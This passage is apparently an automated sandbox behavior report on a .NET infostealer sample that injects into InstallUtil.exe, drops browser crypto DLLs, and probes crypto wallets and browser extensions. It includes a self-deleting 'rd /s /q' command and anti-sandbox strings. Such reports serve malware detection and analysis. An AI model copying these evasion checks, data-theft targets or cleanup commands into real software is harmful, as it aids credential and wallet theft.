                        Source: unknown Process created: C:\Users\user\Desktop\7AeSqNv1rC.exe "C:\Users\user\Desktop\7AeSqNv1rC.exe"
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe"
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe"
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe"
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GIEHIDHJDBFI" & exit
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe Section loaded: mscoree.dll
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe Section loaded: apphelp.dll
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe Section loaded: version.dll
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe Section loaded: uxtheme.dll
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe Section loaded: windows.storage.dll
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe Section loaded: wldp.dll
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe Section loaded: profapi.dll
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe Section loaded: cryptsp.dll
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe Section loaded: rsaenh.dll
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe Section loaded: cryptbase.dll
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe Section loaded: dwrite.dll
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe Section loaded: riched20.dll
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe Section loaded: usp10.dll
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe Section loaded: msls31.dll
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe Section loaded: windowscodecs.dll
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe Section loaded: textshaping.dll
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe Section loaded: amsi.dll
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe Section loaded: userenv.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: sspicli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wininet.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rstrtmgr.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ncrypt.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ntasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dbghelp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: iertutil.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.storage.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wldp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: profapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winhttp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mswsock.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: iphlpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winnsi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: urlmon.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: srvcli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: netutils.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dnsapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasadhlp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: fwpuclnt.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: schannel.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mskeyprotect.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: msasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: gpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ncryptsslp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wbemcomn.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: amsi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: userenv.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: uxtheme.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: sxs.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ntmarta.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mozglue.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wsock32.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: msvcp140.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windowscodecs.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: propsys.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.fileexplorer.common.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: apphelp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ntshrui.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: linkinfo.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: edputil.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.staterepositoryps.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: pcacli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winbrand.dll
                        Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wininet.dll
                        Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll
                        Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winhttp.dll
                        Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iphlpapi.dll
                        Source: C:\Windows\SysWOW64\cmd.exe Section loaded: mswsock.dll
                        Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winnsi.dll
                        Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll
                        Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll
                        Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll
                        Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                        Source: Window Recorder Window detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                        Source: 7AeSqNv1rC.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: 7AeSqNv1rC.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: 7AeSqNv1rC.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: mozglue.pdbP source: InstallUtil.exe, 00000004.00000002.2492833314.000000006C6AD000.00000002.00000001.01000000.0000000F.sdmp, InstallUtil.exe, 00000004.00000002.2471746031.0000000028B77000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.4.dr
                        Source: Binary string: freebl3.pdb source: InstallUtil.exe, 00000004.00000002.2469157795.0000000022C0B000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
                        Source: Binary string: freebl3.pdbp source: InstallUtil.exe, 00000004.00000002.2469157795.0000000022C0B000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
                        Source: Binary string: nss3.pdb@ source: InstallUtil.exe, 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp, InstallUtil.exe, 00000004.00000002.2482167987.0000000040931000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.dr
                        Source: Binary string: softokn3.pdb@ source: InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: InstallUtil.exe, 00000004.00000002.2479689311.000000003A9CF000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.4.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: InstallUtil.exe, 00000004.00000002.2474489221.000000002EAE4000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.4.dr
                        Source: Binary string: nss3.pdb source: InstallUtil.exe, 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp, InstallUtil.exe, 00000004.00000002.2482167987.0000000040931000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.dr
                        Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: InstallUtil.exe, 00000004.00000002.2460567735.000000001C7F6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2468701715.0000000022768000.00000002.00001000.00020000.00000000.sdmp
                        Source: Binary string: mozglue.pdb source: InstallUtil.exe, 00000004.00000002.2492833314.000000006C6AD000.00000002.00000001.01000000.0000000F.sdmp, InstallUtil.exe, 00000004.00000002.2471746031.0000000028B77000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.4.dr
                        Source: Binary string: softokn3.pdb source: InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr

                        Data Obfuscation

                        Source: 7AeSqNv1rC.exe, Form1.cs .Net Code: VolatileFunc System.Reflection.Assembly.Load(byte[])
                        Source: 7AeSqNv1rC.exe Static PE information: 0xB52D572E [Wed Apr 28 02:32:14 2066 UTC]
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_00418950
                        Source: freebl3.dll.4.dr Static PE information: section name: .00cfg
                        Source: mozglue.dll.4.dr Static PE information: section name: .00cfg
                        Source: msvcp140.dll.4.dr Static PE information: section name: .didat
                        Source: softokn3.dll.4.dr Static PE information: section name: .00cfg
                        Source: nss3.dll.4.dr Static PE information: section name: .00cfg
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe Code function: 0_2_00007FFD9B7F061A push ebx; iretd 0_2_00007FFD9B7F066A
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe Code function: 0_2_00007FFD9B7F00AD pushad ; iretd 0_2_00007FFD9B7F00C1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0042F142 push ecx; ret 4_2_0042F155
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_00422D3B push esi; ret 4_2_00422D3D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0041DDB5 push ecx; ret 4_2_0041DDC8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_00432715 push 0000004Ch; iretd 4_2_00432726
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_6C66B536 push ecx; ret 4_2_6C66B549
                        Source: 7AeSqNv1rC.exe Static PE information: section name: .text entropy: 7.623939353720136
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File created: C:\ProgramData\mozglue.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File created: C:\ProgramData\nss3.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File created: C:\ProgramData\msvcp140.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File created: C:\ProgramData\freebl3.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File created: C:\ProgramData\vcruntime140.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\clip[1].exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File created: C:\ProgramData\softokn3.dll
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: Yara match File source: 4.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000000.00000002.1905965220.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: Process Memory Space: 7AeSqNv1rC.exe PID: 7300, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 7648, type: MEMORYSTR
                        Source: InstallUtil.exe Binary or memory string: DIR_WATCH.DLL
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
                        Source: InstallUtil.exe Binary or memory string: SBIEDLL.DLL
                        Source: InstallUtil.exe Binary or memory string: API_LOG.DLL
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe Memory allocated: 1040000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe Memory allocated: 1ACD0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos, 4_2_0040180D
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\clip[1].exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe API coverage: 7.2 %
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe TID: 7320 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\SysWOW64\cmd.exe TID: 3704 Thread sleep count: 106 > 30
                        Source: C:\Windows\SysWOW64\cmd.exe TID: 3704 Thread sleep time: -53000s >= -30000s
                        Source: C:\Windows\SysWOW64\timeout.exe TID: 7156 Thread sleep count: 86 > 30
                        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                        Source: C:\Windows\SysWOW64\cmd.exe Last function: Thread delayed
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh 4_2_00410DDB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File Volume queried: C:\ FullSizeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 4_2_0041543D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose, 4_2_00414CC8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 4_2_00409D1C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 4_2_0040D5C6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 4_2_0040B5DF
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 4_2_00401D80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 4_2_0040BF4D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 4_2_00415FD1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 4_2_0040B93F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 4_2_00415B0B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 4_2_0040CD37
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 4_2_00415142
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_00410FBA GetSystemInfo,wsprintfA, 4_2_00410FBA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
